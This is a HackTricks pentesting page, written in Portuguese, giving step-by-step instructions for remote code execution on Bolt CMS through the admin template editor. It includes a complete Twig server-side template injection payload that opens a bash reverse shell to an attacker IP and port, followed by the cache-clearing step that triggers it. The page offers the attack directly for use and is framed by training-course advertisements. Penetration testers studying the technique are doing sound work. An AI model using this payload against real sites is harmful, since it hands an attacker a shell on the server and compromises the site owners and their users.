hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md
2024-12-12 13:56:11 +01:00

3.4 KiB

Bolt CMS

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

RCE

Após fazer login como admin (vá para /bot para acessar o prompt de login), você pode obter RCE no Bolt CMS:

  • Selecione Configuration -> View Configuration -> Main Configuration ou vá para o caminho da URL /bolt/file-edit/config?file=/bolt/config.yaml
  • Verifique o valor do tema
  • Selecione File management -> View & edit templates
  • Selecione a base do tema encontrada no passo anterior (base-2021 neste caso) e selecione index.twig
  • No meu caso, isso está no caminho da URL /bolt/file-edit/themes?file=/base-2021/index.twig
  • Defina seu payload neste arquivo via template injection (Twig), como: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • E salve as alterações
  • Limpe o cache em Maintenance -> Clear the cache
  • Acesse novamente a página como um usuário regular, e o payload deve ser executado

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}